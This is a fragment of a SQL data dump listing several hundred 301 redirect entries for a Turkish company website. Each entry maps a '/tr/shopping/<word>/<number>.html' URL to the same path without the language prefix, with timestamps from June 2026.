00:00:00',301),(76108,'https://3s-technologies.com.tr/tr/shopping/christology/1712605253.html',NULL,'https://3s-technologies.com.tr/shopping/christology/1712605253.html','',1,0,'2026-06-11 08:33:44','0000-00-00 00:00:00',301),(76109,'https://3s-technologies.com.tr/tr/shopping/xenodochy/1466036924.html',NULL,'https://3s-technologies.com.tr/shopping/xenodochy/1466036924.html','',1,0,'2026-06-11 08:33:52','0000-00-00 00:00:00',301),(76110,'https://3s-technologies.com.tr/tr/shopping/yagouarondi/1701051102.html',NULL,'https://3s-technologies.com.tr/shopping/yagouarondi/1701051102.html','',1,0,'2026-06-11 08:34:00','0000-00-00 00:00:00',301),(76111,'https://3s-technologies.com.tr/tr/shopping/unfaithful/3371894882.html',NULL,'https://3s-technologies.com.tr/shopping/unfaithful/3371894882.html','',1,0,'2026-06-11 08:34:11','0000-00-00 00:00:00',301),(76112,'https://3s-technologies.com.tr/tr/shopping/magdala/1374051139.html',NULL,'https://3s-technologies.com.tr/shopping/magdala/1374051139.html','',1,0,'2026-06-11 08:34:17','0000-00-00 00:00:00',301),(76113,'https://3s-technologies.com.tr/tr/shopping/unseasoned/3928903399.html',NULL,'https://3s-technologies.com.tr/shopping/unseasoned/3928903399.html','',1,0,'2026-06-11 08:34:25','0000-00-00 00:00:00',301),(76114,'https://3s-technologies.com.tr/tr/shopping/convertibleness/3706441287.html',NULL,'https://3s-technologies.com.tr/shopping/convertibleness/3706441287.html','',1,0,'2026-06-11 08:34:33','0000-00-00 00:00:00',301),(76115,'https://3s-technologies.com.tr/tr/shopping/ruffling/3211973095.html',NULL,'https://3s-technologies.com.tr/shopping/ruffling/3211973095.html','',1,0,'2026-06-11 08:34:42','0000-00-00 00:00:00',301),(76116,'https://3s-technologies.com.tr/tr/shopping/intermitted/2595428242.html',NULL,'https://3s-technologies.com.tr/shopping/intermitted/2595428242.html','',1,0,'2026-06-11 08:34:48','0000-00-00 00:00:00',301),(76117,'https://3s-technologies.com.tr/tr/shopping/worktable/1805709789.html',NULL,'https://3s-technologies.com.tr/shopping/worktable/1805709789.html','',1,0,'2026-06-11 08:34:56','0000-00-00 00:00:00',301),(76118,'https://3s-technologies.com.tr/tr/shopping/selfregistering/2064413380.html',NULL,'https://3s-technologies.com.tr/shopping/selfregistering/2064413380.html','',1,0,'2026-06-11 08:35:04','0000-00-00 00:00:00',301),(76119,'https://3s-technologies.com.tr/tr/shopping/hallelujah/131912664.html',NULL,'https://3s-technologies.com.tr/shopping/hallelujah/131912664.html','',1,0,'2026-06-11 08:35:16','0000-00-00 00:00:00',301),(76120,'https://3s-technologies.com.tr/tr/shopping/impetuosity/3202449639.html',NULL,'https://3s-technologies.com.tr/shopping/impetuosity/3202449639.html','',1,0,'2026-06-11 08:35:20','0000-00-00 00:00:00',301),(76121,'https://3s-technologies.com.tr/tr/shopping/portioned/2439803646.html',NULL,'https://3s-technologies.com.tr/shopping/portioned/2439803646.html','',1,0,'2026-06-11 08:35:28','0000-00-00 00:00:00',301),(76122,'https://3s-technologies.com.tr/tr/shopping/motordriven/279881530.html',NULL,'https://3s-technologies.com.tr/shopping/motordriven/279881530.html','',1,0,'2026-06-11 08:35:36','0000-00-00 00:00:00',301),(76123,'https://3s-technologies.com.tr/tr/shopping/betadglucopyranoside/289222629.html',NULL,'https://3s-technologies.com.tr/shopping/betadglucopyranoside/289222629.html','',1,0,'2026-06-11 08:35:46','0000-00-00 00:00:00',301),(76124,'https://3s-technologies.com.tr/tr/shopping/handbasket/2856234006.html',NULL,'https://3s-technologies.com.tr/shopping/handbasket/2856234006.html','',1,0,'2026-06-11 08:35:51','0000-00-00 00:00:00',301),(76125,'https://3s-technologies.com.tr/tr/shopping/porpoise/578186456.html',NULL,'https://3s-technologies.com.tr/shopping/porpoise/578186456.html','',1,0,'2026-06-11 08:35:59','0000-00-00 00:00:00',301),(76126,'https://3s-technologies.com.tr/tr/shopping/pestalozzianism/1494504718.html',NULL,'https://3s-technologies.com.tr/shopping/pestalozzianism/1494504718.html','',1,0,'2026-06-11 08:36:06','0000-00-00 00:00:00',301),(76127,'https://3s-technologies.com.tr/tr/shopping/mopeful/2100448449.html',NULL,'https://3s-technologies.com.tr/shopping/mopeful/2100448449.html','',1,0,'2026-06-11 08:36:17','0000-00-00 00:00:00',301),(76128,'https://3s-technologies.com.tr/tr/shopping/drawloom/2729672008.html',NULL,'https://3s-technologies.com.tr/shopping/drawloom/2729672008.html','',1,0,'2026-06-11 08:36:22','0000-00-00 00:00:00',301),(76129,'https://3s-technologies.com.tr/tr/shopping/hatchery/619945145.html',NULL,'https://3s-technologies.com.tr/shopping/hatchery/619945145.html','',1,0,'2026-06-11 08:36:30','0000-00-00 00:00:00',301),(76130,'https://3s-technologies.com.tr/tr/shopping/assaultable/3383582928.html',NULL,'https://3s-technologies.com.tr/shopping/assaultable/3383582928.html','',1,0,'2026-06-11 08:36:38','0000-00-00 00:00:00',301),(76131,'https://3s-technologies.com.tr/tr/shopping/sunray/165271583.html',NULL,'https://3s-technologies.com.tr/shopping/sunray/165271583.html','',1,0,'2026-06-11 08:36:46','0000-00-00 00:00:00',301),(76132,'https://3s-technologies.com.tr/tr/shopping/lothringen/79079583.html',NULL,'https://3s-technologies.com.tr/shopping/lothringen/79079583.html','',1,0,'2026-06-11 08:36:54','0000-00-00 00:00:00',301),(76133,'https://3s-technologies.com.tr/tr/shopping/hagging/2942258161.html',NULL,'https://3s-technologies.com.tr/shopping/hagging/2942258161.html','',1,0,'2026-06-11 08:37:02','0000-00-00 00:00:00',301),(76134,'https://3s-technologies.com.tr/tr/shopping/biliary/2851657385.html',NULL,'https://3s-technologies.com.tr/shopping/biliary/2851657385.html','',1,0,'2026-06-11 08:37:10','0000-00-00 00:00:00',301),(76135,'https://3s-technologies.com.tr/tr/shopping/maturation/767536304.html',NULL,'https://3s-technologies.com.tr/shopping/maturation/767536304.html','',1,0,'2026-06-11 08:37:19','0000-00-00 00:00:00',301),(76136,'https://3s-technologies.com.tr/tr/shopping/patency/3072793791.html',NULL,'https://3s-technologies.com.tr/shopping/patency/3072793791.html','',1,0,'2026-06-11 08:37:26','0000-00-00 00:00:00',301),(76137,'https://3s-technologies.com.tr/tr/shopping/feverfew/2298152188.html',NULL,'https://3s-technologies.com.tr/shopping/feverfew/2298152188.html','',1,0,'2026-06-11 08:37:34','0000-00-00 00:00:00',301),(76138,'https://3s-technologies.com.tr/tr/shopping/johnius/1381635834.html',NULL,'https://3s-technologies.com.tr/shopping/johnius/1381635834.html','',1,0,'2026-06-11 08:37:42','0000-00-00 00:00:00',301),(76139,'https://3s-technologies.com.tr/tr/shopping/orthometric/646828036.html',NULL,'https://3s-technologies.com.tr/shopping/orthometric/646828036.html','',1,0,'2026-06-11 08:37:50','0000-00-00 00:00:00',301),(76140,'https://3s-technologies.com.tr/tr/shopping/translatable/2404942166.html',NULL,'https://3s-technologies.com.tr/shopping/translatable/2404942166.html','',1,0,'2026-06-11 08:37:58','0000-00-00 00:00:00',301),(76141,'https://3s-technologies.com.tr/tr/shopping/quean/1648614008.html',NULL,'https://3s-technologies.com.tr/shopping/quean/1648614008.html','',1,0,'2026-06-11 08:38:06','0000-00-00 00:00:00',301),(76142,'https://3s-technologies.com.tr/tr/shopping/episode/3376569926.html',NULL,'https://3s-technologies.com.tr/shopping/episode/3376569926.html','',1,0,'2026-06-11 08:38:14','0000-00-00 00:00:00',301),(76143,'https://3s-technologies.com.tr/tr/shopping/accounting/1014286128.html',NULL,'https://3s-technologies.com.tr/shopping/accounting/1014286128.html','',1,0,'2026-06-11 08:38:23','0000-00-00 00:00:00',301),(76144,'https://3s-technologies.com.tr/tr/shopping/bodice/175141678.html',NULL,'https://3s-technologies.com.tr/shopping/bodice/175141678.html','',1,0,'2026-06-11 08:38:29','0000-00-00 00:00:00',301),(76145,'https://3s-technologies.com.tr/tr/shopping/singed/1476605359.html',NULL,'https://3s-technologies.com.tr/shopping/singed/1476605359.html','',1,0,'2026-06-11 08:38:37','0000-00-00 00:00:00',301),(76146,'https://3s-technologies.com.tr/tr/shopping/reenlist/2951893866.html',NULL,'https://3s-technologies.com.tr/shopping/reenlist/2951893866.html','',1,0,'2026-06-11 08:38:45','0000-00-00 00:00:00',301),(76147,'https://3s-technologies.com.tr/tr/shopping/encloud/2947141555.html',NULL,'https://3s-technologies.com.tr/shopping/encloud/2947141555.html','',1,0,'2026-06-11 08:38:51','0000-00-00 00:00:00',301),(76148,'https://3s-technologies.com.tr/tr/shopping/overwind/4015222176.html',NULL,'https://3s-technologies.com.tr/shopping/overwind/4015222176.html','',1,0,'2026-06-11 08:38:54','0000-00-00 00:00:00',301),(76149,'https://3s-technologies.com.tr/tr/shopping/crystallizable/1132625335.html',NULL,'https://3s-technologies.com.tr/shopping/crystallizable/1132625335.html','',1,0,'2026-06-11 08:38:57','0000-00-00 00:00:00',301),(76150,'https://3s-technologies.com.tr/tr/shopping/sunbeam/2579121748.html',NULL,'https://3s-technologies.com.tr/shopping/sunbeam/2579121748.html','',1,0,'2026-06-11 08:39:01','0000-00-00 00:00:00',301),(76151,'https://3s-technologies.com.tr/tr/shopping/plasmator/786007372.html',NULL,'https://3s-technologies.com.tr/shopping/plasmator/786007372.html','',1,0,'2026-06-11 08:39:04','0000-00-00 00:00:00',301),(76152,'https://3s-technologies.com.tr/tr/shopping/subconcave/1334437364.html',NULL,'https://3s-technologies.com.tr/shopping/subconcave/1334437364.html','',1,0,'2026-06-11 08:39:07','0000-00-00 00:00:00',301),(76153,'https://3s-technologies.com.tr/tr/shopping/queer/3818925783.html',NULL,'https://3s-technologies.com.tr/shopping/queer/3818925783.html','',1,0,'2026-06-11 08:39:10','0000-00-00 00:00:00',301),(76154,'https://3s-technologies.com.tr/tr/shopping/misvalue/3302329961.html',NULL,'https://3s-technologies.com.tr/shopping/misvalue/3302329961.html','',1,0,'2026-06-11 08:39:13','0000-00-00 00:00:00',301),(76155,'https://3s-technologies.com.tr/tr/shopping/underverse/636485984.html',NULL,'https://3s-technologies.com.tr/shopping/underverse/636485984.html','',1,0,'2026-06-11 08:39:16','0000-00-00 00:00:00',301),(76156,'https://3s-technologies.com.tr/tr/shopping/fluitans/1257805598.html',NULL,'https://3s-technologies.com.tr/shopping/fluitans/1257805598.html','',1,0,'2026-06-11 08:39:19','0000-00-00 00:00:00',301),(76157,'https://3s-technologies.com.tr/tr/shopping/mitring/2865497870.html',NULL,'https://3s-technologies.com.tr/shopping/mitring/2865497870.html','',1,0,'2026-06-11 08:39:22','0000-00-00 00:00:00',301),(76158,'https://3s-technologies.com.tr/tr/shopping/beetling/2784334337.html',NULL,'https://3s-technologies.com.tr/shopping/beetling/2784334337.html','',1,0,'2026-06-11 08:39:25','0000-00-00 00:00:00',301),(76159,'https://3s-technologies.com.tr/tr/shopping/piningly/1737620972.html',NULL,'https://3s-technologies.com.tr/shopping/piningly/1737620972.html','',1,0,'2026-06-11 08:39:28','0000-00-00 00:00:00',301),(76160,'https://3s-technologies.com.tr/tr/shopping/styptical/2823144183.html',NULL,'https://3s-technologies.com.tr/shopping/styptical/2823144183.html','',1,0,'2026-06-11 08:39:31','0000-00-00 00:00:00',301),(76161,'https://3s-technologies.com.tr/tr/shopping/setule/3448872544.html',NULL,'https://3s-technologies.com.tr/shopping/setule/3448872544.html','',1,0,'2026-06-11 08:39:34','0000-00-00 00:00:00',301),(76162,'https://3s-technologies.com.tr/tr/shopping/caroused/3879679153.html',NULL,'https://3s-technologies.com.tr/shopping/caroused/3879679153.html','',1,0,'2026-06-11 08:39:37','0000-00-00 00:00:00',301),(76163,'https://3s-technologies.com.tr/tr/shopping/quadriga/4065031582.html',NULL,'https://3s-technologies.com.tr/shopping/quadriga/4065031582.html','',1,0,'2026-06-11 08:39:40','0000-00-00 00:00:00',301),(76164,'https://3s-technologies.com.tr/tr/shopping/espaliering/443635126.html',NULL,'https://3s-technologies.com.tr/shopping/espaliering/443635126.html','',1,0,'2026-06-11 08:39:43','0000-00-00 00:00:00',301),(76165,'https://3s-technologies.com.tr/tr/shopping/govern/1786633771.html',NULL,'https://3s-technologies.com.tr/shopping/govern/1786633771.html','',1,0,'2026-06-11 08:39:46','0000-00-00 00:00:00',301),(76166,'https://3s-technologies.com.tr/tr/shopping/kopeek/3692040329.html',NULL,'https://3s-technologies.com.tr/shopping/kopeek/3692040329.html','',1,0,'2026-06-11 08:39:49','0000-00-00 00:00:00',301),(76167,'https://3s-technologies.com.tr/tr/shopping/trowsers/386932050.html',NULL,'https://3s-technologies.com.tr/shopping/trowsers/386932050.html','',1,0,'2026-06-11 08:39:54','0000-00-00 00:00:00',301),(76168,'https://3s-technologies.com.tr/tr/shopping/geldable/3973436547.html',NULL,'https://3s-technologies.com.tr/shopping/geldable/3973436547.html','',1,0,'2026-06-11 08:39:56','0000-00-00 00:00:00',301),(76169,'https://3s-technologies.com.tr/tr/shopping/semiangle/2549320159.html',NULL,'https://3s-technologies.com.tr/shopping/semiangle/2549320159.html','',1,0,'2026-06-11 08:39:59','0000-00-00 00:00:00',301),(76170,'https://3s-technologies.com.tr/tr/shopping/episodic/4003672928.html',NULL,'https://3s-technologies.com.tr/shopping/episodic/4003672928.html','',1,0,'2026-06-11 08:40:02','0000-00-00 00:00:00',301),(76171,'https://3s-technologies.com.tr/tr/shopping/howell/356465388.html',NULL,'https://3s-technologies.com.tr/shopping/howell/356465388.html','',1,0,'2026-06-11 08:40:04','0000-00-00 00:00:00',301),(76172,'https://3s-technologies.com.tr/tr/shopping/synartesis/2783122238.html',NULL,'https://3s-technologies.com.tr/shopping/synartesis/2783122238.html','',1,0,'2026-06-11 08:40:08','0000-00-00 00:00:00',301),(76173,'https://3s-technologies.com.tr/tr/shopping/suspicious/3940633256.html',NULL,'https://3s-technologies.com.tr/shopping/suspicious/3940633256.html','',1,0,'2026-06-11 08:40:10','0000-00-00 00:00:00',301),(76174,'https://3s-technologies.com.tr/tr/shopping/querpo/1870835866.html',NULL,'https://3s-technologies.com.tr/shopping/querpo/1870835866.html','',1,0,'2026-06-11 08:40:14','0000-00-00 00:00:00',301),(76175,'https://3s-technologies.com.tr/tr/shopping/censurable/4112615883.html',NULL,'https://3s-technologies.com.tr/shopping/censurable/4112615883.html','',1,0,'2026-06-11 08:40:17','0000-00-00 00:00:00',301),(76176,'https://3s-technologies.com.tr/tr/shopping/chirruping/3301117862.html',NULL,'https://3s-technologies.com.tr/shopping/chirruping/3301117862.html','',1,0,'2026-06-11 08:40:20','0000-00-00 00:00:00',301),(76177,'https://3s-technologies.com.tr/tr/shopping/bewreck/3115235015.html',NULL,'https://3s-technologies.com.tr/shopping/bewreck/3115235015.html','',1,0,'2026-06-11 08:40:23','0000-00-00 00:00:00',301),(76178,'https://3s-technologies.com.tr/tr/shopping/ancillary/2526729540.html',NULL,'https://3s-technologies.com.tr/shopping/ancillary/2526729540.html','',1,0,'2026-06-11 08:40:26','0000-00-00 00:00:00',301),(76179,'https://3s-technologies.com.tr/tr/shopping/inviolability/4063632729.html',NULL,'https://3s-technologies.com.tr/shopping/inviolability/4063632729.html','',1,0,'2026-06-11 08:40:29','0000-00-00 00:00:00',301),(76180,'https://3s-technologies.com.tr/tr/shopping/fleeceless/952888733.html',NULL,'https://3s-technologies.com.tr/shopping/fleeceless/952888733.html','',1,0,'2026-06-11 08:40:32','0000-00-00 00:00:00',301),(76181,'https://3s-technologies.com.tr/tr/shopping/apostatize/2243590455.html',NULL,'https://3s-technologies.com.tr/shopping/apostatize/2243590455.html','',1,0,'2026-06-11 08:40:35','0000-00-00 00:00:00',301),(76182,'https://3s-technologies.com.tr/tr/shopping/distributive/815687265.html',NULL,'https://3s-technologies.com.tr/shopping/distributive/815687265.html','',1,0,'2026-06-11 08:40:38','0000-00-00 00:00:00',301),(76183,'https://3s-technologies.com.tr/tr/shopping/condensative/2802161348.html',NULL,'https://3s-technologies.com.tr/shopping/condensative/2802161348.html','',1,0,'2026-06-11 08:40:50','0000-00-00 00:00:00',301),(76184,'https://3s-technologies.com.tr/tr/shopping/ringbolt/862671535.html',NULL,'https://3s-technologies.com.tr/shopping/ringbolt/862671535.html','',1,0,'2026-06-11 08:40:53','0000-00-00 00:00:00',301),(76185,'https://3s-technologies.com.tr/tr/shopping/superseding/2368632806.html',NULL,'https://3s-technologies.com.tr/shopping/superseding/2368632806.html','',1,0,'2026-06-11 08:40:56','0000-00-00 00:00:00',301),(76186,'https://3s-technologies.com.tr/tr/shopping/byssiferous/147355138.html',NULL,'https://3s-technologies.com.tr/shopping/byssiferous/147355138.html','',1,0,'2026-06-11 08:40:59','0000-00-00 00:00:00',301),(76187,'https://3s-technologies.com.tr/tr/shopping/phantasmal/612768652.html',NULL,'https://3s-technologies.com.tr/shopping/phantasmal/612768652.html','',1,0,'2026-06-11 08:41:02','0000-00-00 00:00:00',301),(76188,'https://3s-technologies.com.tr/tr/shopping/uncurably/768652318.html',NULL,'https://3s-technologies.com.tr/shopping/uncurably/768652318.html','',1,0,'2026-06-11 08:41:05','0000-00-00 00:00:00',301),(76189,'https://3s-technologies.com.tr/tr/shopping/uncrown/3843032032.html',NULL,'https://3s-technologies.com.tr/shopping/uncrown/3843032032.html','',1,0,'2026-06-11 08:41:08','0000-00-00 00:00:00',301),(76190,'https://3s-technologies.com.tr/tr/shopping/outbrazen/382343262.html',NULL,'https://3s-technologies.com.tr/shopping/outbrazen/382343262.html','',1,0,'2026-06-11 08:41:11','0000-00-00 00:00:00',301),(76191,'https://3s-technologies.com.tr/tr/shopping/lapwing/2955484755.html',NULL,'https://3s-technologies.com.tr/shopping/lapwing/2955484755.html','',1,0,'2026-06-11 08:41:14','0000-00-00 00:00:00',301),(76192,'https://3s-technologies.com.tr/tr/shopping/haversack/413113526.html',NULL,'https://3s-technologies.com.tr/shopping/haversack/413113526.html','',1,0,'2026-06-11 08:41:17','0000-00-00 00:00:00',301),(76193,'https://3s-technologies.com.tr/tr/shopping/thrack/2081722676.html',NULL,'https://3s-technologies.com.tr/shopping/thrack/2081722676.html','',1,0,'2026-06-11 08:41:20','0000-00-00 00:00:00',301),(76194,'https://3s-technologies.com.tr/tr/shopping/enterer/509973318.html',NULL,'https://3s-technologies.com.tr/shopping/enterer/509973318.html','',1,0,'2026-06-11 08:41:23','0000-00-00 00:00:00',301),(76195,'https://3s-technologies.com.tr/tr/shopping/stythy/3168365514.html',NULL,'https://3s-technologies.com.tr/shopping/stythy/3168365514.html','',1,0,'2026-06-11 08:41:26','0000-00-00 00:00:00',301),(76196,'https://3s-technologies.com.tr/tr/shopping/polygonous/2799386889.html',NULL,'https://3s-technologies.com.tr/shopping/polygonous/2799386889.html','',1,0,'2026-06-11 08:41:29','0000-00-00 00:00:00',301),(76197,'https://3s-technologies.com.tr/tr/shopping/parenthetical/2900035573.html',NULL,'https://3s-technologies.com.tr/shopping/parenthetical/2900035573.html','',1,0,'2026-06-11 08:41:32','0000-00-00 00:00:00',301),(76198,'https://3s-technologies.com.tr/tr/shopping/vincture/547520847.html',NULL,'https://3s-technologies.com.tr/shopping/vincture/547520847.html','',1,0,'2026-06-11 08:41:35','0000-00-00 00:00:00',301),(76199,'https://3s-technologies.com.tr/tr/shopping/postured/1906358457.html',NULL,'https://3s-technologies.com.tr/shopping/postured/1906358457.html','',1,0,'2026-06-11 08:41:38','0000-00-00 00:00:00',301),(76200,'https://3s-technologies.com.tr/tr/shopping/restrict/2210021411.html',NULL,'https://3s-technologies.com.tr/shopping/restrict/2210021411.html','',1,0,'2026-06-11 08:41:41','0000-00-00 00:00:00',301),(76201,'https://3s-technologies.com.tr/tr/shopping/vocal/564268752.html',NULL,'https://3s-technologies.com.tr/shopping/vocal/564268752.html','',1,0,'2026-06-11 08:41:44','0000-00-00 00:00:00',301),(76202,'https://3s-technologies.com.tr/tr/shopping/denture/1561625733.html',NULL,'https://3s-technologies.com.tr/shopping/denture/1561625733.html','',1,0,'2026-06-11 08:41:47','0000-00-00 00:00:00',301),(76203,'https://3s-technologies.com.tr/tr/shopping/firstyear/2343924343.html',NULL,'https://3s-technologies.com.tr/shopping/firstyear/2343924343.html','',1,0,'2026-06-11 08:41:50','0000-00-00 00:00:00',301),(76204,'https://3s-technologies.com.tr/tr/shopping/calombo/4200712485.html',NULL,'https://3s-technologies.com.tr/shopping/calombo/4200712485.html','',1,0,'2026-06-11 08:41:53','0000-00-00 00:00:00',301),(76205,'https://3s-technologies.com.tr/tr/shopping/subingression/2156024171.html',NULL,'https://3s-technologies.com.tr/shopping/subingression/2156024171.html','',1,0,'2026-06-11 08:41:56','0000-00-00 00:00:00',301),(76206,'https://3s-technologies.com.tr/tr/shopping/demurrer/1163700995.html',NULL,'https://3s-technologies.com.tr/shopping/demurrer/1163700995.html','',1,0,'2026-06-11 08:41:59','0000-00-00 00:00:00',301),(76207,'https://3s-technologies.com.tr/tr/shopping/proxime/2701600233.html',NULL,'https://3s-technologies.com.tr/shopping/proxime/2701600233.html','',1,0,'2026-06-11 08:42:02','0000-00-00 00:00:00',301),(76208,'https://3s-technologies.com.tr/tr/shopping/emulsion/3393924980.html',NULL,'https://3s-technologies.com.tr/shopping/emulsion/3393924980.html','',1,0,'2026-06-11 08:42:05','0000-00-00 00:00:00',301),(76209,'https://3s-technologies.com.tr/tr/shopping/yieldableness/3273471417.html',NULL,'https://3s-technologies.com.tr/shopping/yieldableness/3273471417.html','',1,0,'2026-06-11 08:42:08','0000-00-00 00:00:00',301),(76210,'https://3s-technologies.com.tr/tr/shopping/dummies/2313241648.html',NULL,'https://3s-technologies.com.tr/shopping/dummies/2313241648.html','',1,0,'2026-06-11 08:42:11','0000-00-00 00:00:00',301),(76211,'https://3s-technologies.com.tr/tr/shopping/bluegrass/730452659.html',NULL,'https://3s-technologies.com.tr/shopping/bluegrass/730452659.html','',1,0,'2026-06-11 08:42:14','0000-00-00 00:00:00',301),(76212,'https://3s-technologies.com.tr/tr/shopping/lionized/290357477.html',NULL,'https://3s-technologies.com.tr/shopping/lionized/290357477.html','',1,0,'2026-06-11 08:42:17','0000-00-00 00:00:00',301),(76213,'https://3s-technologies.com.tr/tr/shopping/benight/1148208764.html',NULL,'https://3s-technologies.com.tr/shopping/benight/1148208764.html','',1,0,'2026-06-11 08:42:20','0000-00-00 00:00:00',301),(76214,'https://3s-technologies.com.tr/tr/shopping/discomposedly/2449838150.html',NULL,'https://3s-technologies.com.tr/shopping/discomposedly/2449838150.html','',1,0,'2026-06-11 08:42:23','0000-00-00 00:00:00',301),(76215,'https://3s-technologies.com.tr/tr/shopping/atabal/3431961116.html',NULL,'https://3s-technologies.com.tr/shopping/atabal/3431961116.html','',1,0,'2026-06-11 08:42:26','0000-00-00 00:00:00',301),(76216,'https://3s-technologies.com.tr/tr/shopping/unwork/2998928829.html',NULL,'https://3s-technologies.com.tr/shopping/unwork/2998928829.html','',1,0,'2026-06-11 08:42:29','0000-00-00 00:00:00',301),(76217,'https://3s-technologies.com.tr/tr/shopping/gazed/4226923217.html',NULL,'https://3s-technologies.com.tr/shopping/gazed/4226923217.html','',1,0,'2026-06-11 08:42:32','0000-00-00 00:00:00',301),(76218,'https://3s-technologies.com.tr/tr/shopping/ditone/2877613412.html',NULL,'https://3s-technologies.com.tr/shopping/ditone/2877613412.html','',1,0,'2026-06-11 08:42:35','0000-00-00 00:00:00',301),(76219,'https://3s-technologies.com.tr/tr/shopping/triune/3057257985.html',NULL,'https://3s-technologies.com.tr/shopping/triune/3057257985.html','',1,0,'2026-06-11 08:42:38','0000-00-00 00:00:00',301),(76220,'https://3s-technologies.com.tr/tr/shopping/bedwarf/3685772388.html',NULL,'https://3s-technologies.com.tr/shopping/bedwarf/3685772388.html','',1,0,'2026-06-11 08:42:41','0000-00-00 00:00:00',301),(76221,'https://3s-technologies.com.tr/tr/shopping/brachydiagonal/2207597229.html',NULL,'https://3s-technologies.com.tr/shopping/brachydiagonal/2207597229.html','',1,0,'2026-06-11 08:42:44','0000-00-00 00:00:00',301),(76222,'https://3s-technologies.com.tr/tr/shopping/hypercriticise/3991877085.html',NULL,'https://3s-technologies.com.tr/shopping/hypercriticise/3991877085.html','',1,0,'2026-06-11 08:42:47','0000-00-00 00:00:00',301),(76223,'https://3s-technologies.com.tr/tr/shopping/binous/2311866010.html',NULL,'https://3s-technologies.com.tr/shopping/binous/2311866010.html','',1,0,'2026-06-11 08:42:50','0000-00-00 00:00:00',301),(76224,'https://3s-technologies.com.tr/tr/shopping/steeving/2827854699.html',NULL,'https://3s-technologies.com.tr/shopping/steeving/2827854699.html','',1,0,'2026-06-11 08:42:53','0000-00-00 00:00:00',301),(76225,'https://3s-technologies.com.tr/tr/shopping/inimicality/1087463033.html',NULL,'https://3s-technologies.com.tr/shopping/inimicality/1087463033.html','',1,0,'2026-06-11 08:42:58','0000-00-00 00:00:00',301),(76226,'https://3s-technologies.com.tr/tr/shopping/annoyance/3587732441.html',NULL,'https://3s-technologies.com.tr/shopping/annoyance/3587732441.html','',1,0,'2026-06-11 08:43:00','0000-00-00 00:00:00',301),(76227,'https://3s-technologies.com.tr/tr/shopping/gouache/2571343025.html',NULL,'https://3s-technologies.com.tr/shopping/gouache/2571343025.html','',1,0,'2026-06-11 08:43:03','0000-00-00 00:00:00',301),(76228,'https://3s-technologies.com.tr/tr/shopping/pharynges/2643482088.html',NULL,'https://3s-technologies.com.tr/shopping/pharynges/2643482088.html','',1,0,'2026-06-11 08:43:06','0000-00-00 00:00:00',301),(76229,'https://3s-technologies.com.tr/tr/shopping/semibrief/3648860814.html',NULL,'https://3s-technologies.com.tr/shopping/semibrief/3648860814.html','',1,0,'2026-06-11 08:43:09','0000-00-00 00:00:00',301),(76230,'https://3s-technologies.com.tr/tr/shopping/chivied/1355507755.html',NULL,'https://3s-technologies.com.tr/shopping/chivied/1355507755.html','',1,0,'2026-06-11 08:43:12','0000-00-00 00:00:00',301),(76231,'https://3s-technologies.com.tr/tr/shopping/pyrotechnic/3376063781.html',NULL,'https://3s-technologies.com.tr/shopping/pyrotechnic/3376063781.html','',1,0,'2026-06-11 08:43:15','0000-00-00 00:00:00',301),(76232,'https://3s-technologies.com.tr/tr/shopping/engrapple/1378827203.html',NULL,'https://3s-technologies.com.tr/shopping/engrapple/1378827203.html','',1,0,'2026-06-11 08:43:18','0000-00-00 00:00:00',301),(76233,'https://3s-technologies.com.tr/tr/shopping/inactose/2719565156.html',NULL,'https://3s-technologies.com.tr/shopping/inactose/2719565156.html','',1,0,'2026-06-11 08:43:21','0000-00-00 00:00:00',301),(76234,'https://3s-technologies.com.tr/tr/shopping/vitious/1609943814.html',NULL,'https://3s-technologies.com.tr/shopping/vitious/1609943814.html','',1,0,'2026-06-11 08:43:24','0000-00-00 00:00:00',301),(76235,'https://3s-technologies.com.tr/tr/shopping/myomorph/1097406362.html',NULL,'https://3s-technologies.com.tr/shopping/myomorph/1097406362.html','',1,0,'2026-06-11 08:43:27','0000-00-00 00:00:00',301),(76236,'https://3s-technologies.com.tr/tr/shopping/asaphus/2604605802.html',NULL,'https://3s-technologies.com.tr/shopping/asaphus/2604605802.html','',1,0,'2026-06-11 08:43:30','0000-00-00 00:00:00',301),(76237,'https://3s-technologies.com.tr/tr/shopping/refusal/1956070456.html',NULL,'https://3s-technologies.com.tr/shopping/refusal/1956070456.html','',1,0,'2026-06-11 08:43:33','0000-00-00 00:00:00',301),(76238,'https://3s-technologies.com.tr/tr/shopping/sweeping/1452848065.html',NULL,'https://3s-technologies.com.tr/shopping/sweeping/1452848065.html','',1,0,'2026-06-11 08:43:36','0000-00-00 00:00:00',301),(76239,'https://3s-technologies.com.tr/tr/shopping/widals/3544103844.html',NULL,'https://3s-technologies.com.tr/shopping/widals/3544103844.html','',1,0,'2026-06-11 08:43:39','0000-00-00 00:00:00',301),(76240,'https://3s-technologies.com.tr/tr/shopping/worsted/3093898338.html',NULL,'https://3s-technologies.com.tr/shopping/worsted/3093898338.html','',1,0,'2026-06-11 08:43:42','0000-00-00 00:00:00',301),(76241,'https://3s-technologies.com.tr/tr/shopping/gripes/1451129821.html',NULL,'https://3s-technologies.com.tr/shopping/gripes/1451129821.html','',1,0,'2026-06-11 08:43:47','0000-00-00 00:00:00',301),(76242,'https://3s-technologies.com.tr/tr/shopping/tramrail/2553642613.html',NULL,'https://3s-technologies.com.tr/shopping/tramrail/2553642613.html','',1,0,'2026-06-11 08:43:50','0000-00-00 00:00:00',301),(76243,'https://3s-technologies.com.tr/tr/shopping/biennially/1947175703.html',NULL,'https://3s-technologies.com.tr/shopping/biennially/1947175703.html','',1,0,'2026-06-11 08:43:53','0000-00-00 00:00:00',301),(76244,'https://3s-technologies.com.tr/tr/shopping/theobroma/3883709254.html',NULL,'https://3s-technologies.com.tr/shopping/theobroma/3883709254.html','',1,0,'2026-06-11 08:43:56','0000-00-00 00:00:00',301),(76245,'https://3s-technologies.com.tr/tr/shopping/anthropologist/2965666020.html',NULL,'https://3s-technologies.com.tr/shopping/anthropologist/2965666020.html','',1,0,'2026-06-11 08:43:59','0000-00-00 00:00:00',301),(76246,'https://3s-technologies.com.tr/tr/shopping/intellectualism/3611051921.html',NULL,'https://3s-technologies.com.tr/shopping/intellectualism/3611051921.html','',1,0,'2026-06-11 08:44:02','0000-00-00 00:00:00',301),(76247,'https://3s-technologies.com.tr/tr/shopping/irrefrangibleness/1310292040.html',NULL,'https://3s-technologies.com.tr/shopping/irrefrangibleness/1310292040.html','',1,0,'2026-06-11 08:44:05','0000-00-00 00:00:00',301),(76248,'https://3s-technologies.com.tr/tr/shopping/prevailment/2613574968.html',NULL,'https://3s-technologies.com.tr/shopping/prevailment/2613574968.html','',1,0,'2026-06-11 08:44:08','0000-00-00 